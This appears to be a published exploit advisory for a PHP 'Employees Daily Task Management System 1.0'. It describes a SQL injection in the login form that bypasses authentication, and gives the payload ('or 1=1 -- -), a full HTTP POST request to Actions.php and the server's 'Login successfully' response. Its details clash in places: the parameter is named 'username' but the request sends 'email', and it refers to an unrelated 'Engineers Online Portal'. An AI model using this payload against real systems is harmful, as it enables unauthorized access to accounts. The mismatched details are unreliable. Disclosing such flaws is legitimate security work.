Employees Daily Task Management System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
dc63668edab1dc7baf530ffbbb4e5ba0
# Exploit Title: Employees Daily Task Management System 1.0 - 'username' SQLi Authentication Bypass
# Exploit Author: able403
# Date: 08/12/2021
# Vendor Homepage: https://www.sourcecodester.com/php/15030/employee-daily-task-management-system-php-and-sqlite-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/edtms.zip
# Version: 1.0
# Tested on: windows 10
# Vulnerable page: Actions.php
# VUlnerable parameters: "username"
Technical description:
An SQL Injection vulnerability exists in theEmployees Daily Task Management System admin login form which can allow an attacker to bypass authentication.
Steps to exploit:
1) Navigate to http://localhost/login.php
2) Insert your payload in the user or password field
3) Click login
Proof of concept (Poc):
The following payload will allow you to bypass the authentication mechanism of the Engineers Online Portal login form -
123'+or+1=1+--+-
---
POST /Actions.php?a=employee_login HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 43
Origin: http://edtms.com
Connection: close
Referer: http://edtms.com/login.php
Cookie: PHPSESSID=p98m8ort59hfbo3qdu2o4a59cl
email=admin'+or+1=1+--+-&password=123123213
response
HTTP/1.1 200 OK
Date: Wed, 10 Nov 2021 02:23:38 GMT
Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02
X-Powered-By: PHP/8.0.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 48
{"status":"success","msg":"Login successfully."}
---